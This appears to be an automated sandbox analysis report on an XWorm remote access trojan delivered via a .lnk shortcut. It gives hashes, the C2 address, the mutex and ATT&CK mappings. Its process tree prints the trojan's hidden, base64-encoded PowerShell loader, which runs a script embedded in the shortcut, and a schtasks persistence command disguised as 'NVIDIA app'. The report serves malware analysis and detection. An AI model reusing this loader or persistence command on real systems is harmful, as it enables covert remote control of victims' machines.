xworm | f5e258657d2fff2421af1045023ed6ffa0b2c5bdbee9cb186f143ee47320b0a3

General

Target

example.lnk
Size

106KB
MD5

6975af881b0b0e3751002dcc064b886a
SHA1

fa4fe5dfc3897677ee5b5c69cd189e4167427d37
SHA256

f5e258657d2fff2421af1045023ed6ffa0b2c5bdbee9cb186f143ee47320b0a3
SHA512

6ffa48d6d88ea3466a23e793aaca6288e4175c3cae4daa695213aaaa747077795ec5ea5aad0fb666aa59dff14922c8ef70f39245bafed5f891bf815e6eafb587
SSDEEP

3072:pMFdgBocsBz76H4ELGylzlAX8tKWdJTU+S4St:pMFdgBoRN7yHOorJTU+S4St

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

181.214.214.6:30120

Mutex

z5dRlxK0ktwBzYfm

Attributes

Install_directory
%ProgramData%
install_file
NVIDIA app.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000017474-51.dat	family_xworm
behavioral1/memory/2652-53-0x0000000000170000-0x0000000000180000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2340	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2652	2v1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2848	timeout.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2624	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2620	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2340	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2340	powershell.exe
Token: SeDebugPrivilege	2652	2v1.exe
Token: SeDebugPrivilege	2652	2v1.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2120 wrote to memory of 2340	2120	cmd.exe	31
PID 2120 wrote to memory of 2340	2120	cmd.exe	31
PID 2120 wrote to memory of 2340	2120	cmd.exe	31
PID 2340 wrote to memory of 2624	2340	powershell.exe	33
PID 2340 wrote to memory of 2624	2340	powershell.exe	33
PID 2340 wrote to memory of 2624	2340	powershell.exe	33
PID 2340 wrote to memory of 2652	2340	powershell.exe	34
PID 2340 wrote to memory of 2652	2340	powershell.exe	34
PID 2340 wrote to memory of 2652	2340	powershell.exe	34
PID 2652 wrote to memory of 2620	2652	2v1.exe	35
PID 2652 wrote to memory of 2620	2652	2v1.exe	35
PID 2652 wrote to memory of 2620	2652	2v1.exe	35
PID 2652 wrote to memory of 540	2652	2v1.exe	39
PID 2652 wrote to memory of 540	2652	2v1.exe	39
PID 2652 wrote to memory of 540	2652	2v1.exe	39
PID 2652 wrote to memory of 1764	2652	2v1.exe	41
PID 2652 wrote to memory of 1764	2652	2v1.exe	41
PID 2652 wrote to memory of 1764	2652	2v1.exe	41
PID 1764 wrote to memory of 2848	1764	cmd.exe	43
PID 1764 wrote to memory of 2848	1764	cmd.exe	43
PID 1764 wrote to memory of 2848	1764	cmd.exe	43

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\example.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -noe -WindowStyle hidden -e JABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUAIAA9ACAAMAB4ADAAMAAwADEAOQBlAGYANgAKACQAcwBjAHIAaQBwAHQAXwBsAGUAbgBnAHQAaAAgAD0AIAAyADcAOAA4ADsACgAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAKgAuAGwAbgBrACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAANQAxADIAMAAwAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATgBhAG0AZQA7AAoACgBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlACkAKQAKAHsACgAkAHYAYQBsACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAuAC8AIAAtAEYAaQBsAHQAZQByACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAFIAZQBjAHUAcgBzAGUAOwAKAGkAZgAgACgALQBuAG8AdAAgACQAdgBhAGwAKQAKAHsACgBlAHgAaQB0AAoAfQAKAFsASQBPAC4ARABpAHIAZQBjAHQAbwByAHkAXQA6ADoAUwBlAHQAQwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAoACQAdgBhAGwALgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlACkAOwAKAH0ACgAkAGYAaQBsAGUAcwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAGYAaQBsAGUAbgBhAG0AZQAsACcATwBwAGUAbgAnACwAJwBSAGUAYQBkACcALAAnAFIAZQBhAGQAVwByAGkAdABlACcAOwAKACQAdgBhAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACgAJABzAGMAcgBpAHAAdABfAGwAZQBuAGcAdABoACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBTAGUAZQBrACgAJABzAGMAcgBpAHAAdABfAHMAdABhAHIAdABfAGIAeQB0AGUALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAOwAKACQAcgAgAD0AIAAkAGYAaQBsAGUAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJAB2AGEAbAAsADAALAAkAHMAYwByAGkAcAB0AF8AbABlAG4AZwB0AGgAKQA7AAoAJAB2AGEAbAAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABDAGgAYQByAEEAcgByAGEAeQAoACQAdgBhAGwALAAwACwAJAB2AGEAbAAuAEwAZQBuAGcAdABoACkAOwAKACQAcwB0AHIAaQBuAGcAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB2AGEAbAApADsACgBpAGUAeAAgACQAcwB0AHIAaQBuAGcAOwA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\tesasd.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:2624
- - C:\Users\Admin\AppData\Local\2v1.exe
    "C:\Users\Admin\AppData\Local\2v1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "NVIDIA app" /tr "C:\ProgramData\NVIDIA app.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2620
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /delete /f /tn "NVIDIA app"
      4⤵
      PID:540
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4E5E.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1764
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2848

C:\Windows\system32\taskeng.exe
taskeng.exe {82754B3F-94C7-4CCB-B654-4BC599605B3A} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
1⤵
PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\2v1.exe

Filesize
39KB

MD5
4806c4d94f23b4aa628a7429255dde3e

SHA1
7588e35d34ed8184e34364faf72a3171b9a853ee

SHA256
38027f90b5fa2ddf926f00a1fc93e12e47dc76c0c55d4b75e28205eee31dc573

SHA512
45c16a1fc3985bab29910dc08cad2e10773ab8b59a776220c84698027c84be9a006a6ec311b3a3bcbb3e4c872664f317242783a602e06ef6032cdf9a14accdbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesasd.txt

Filesize
52KB

MD5
11007bb286caf468648bfdb698077dbe

SHA1
c75bacef9096d5e8d3613e062ca10acb492a2d88

SHA256
04864cb1cc9647bd297b3bf8818595fc65d870a8fa74ee3a420fedfcafdfa292

SHA512
8ef29a7c561a224fca5ff289103b7c8e84c12f92e954bc3751907c430562f42c018aa8f5d7599852dea17bccf93e5fbb2e47cc75ba9ce377b58981f011e2ac17

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4E5E.tmp.bat

Filesize
150B

MD5
eac2dfa83128a14dd6922081745a7869

SHA1
f5389a885362d38f2b288b61f3c3d4f9ddf261d3

SHA256
54314c6d9d0785f674c96418b265d30077a222a7d05564be0690eecb0236a0e0

SHA512
2cca8709f1dbf648d925a11351e7d70f480018497858b2eeb85b5f6ffa890ebb410c8714398860edbe8aa92b485bc7435021a3836ab11100c6089c39e0a78f28

Download Submit
memory/2340-41-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2340-43-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2340-42-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2340-46-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2340-44-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2340-38-0x000007FEF5C0E000-0x000007FEF5C0F000-memory.dmp

Filesize
4KB

Download
memory/2340-39-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2340-55-0x000007FEF5C0E000-0x000007FEF5C0F000-memory.dmp

Filesize
4KB

Download
memory/2340-56-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2340-40-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2652-53-0x0000000000170000-0x0000000000180000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads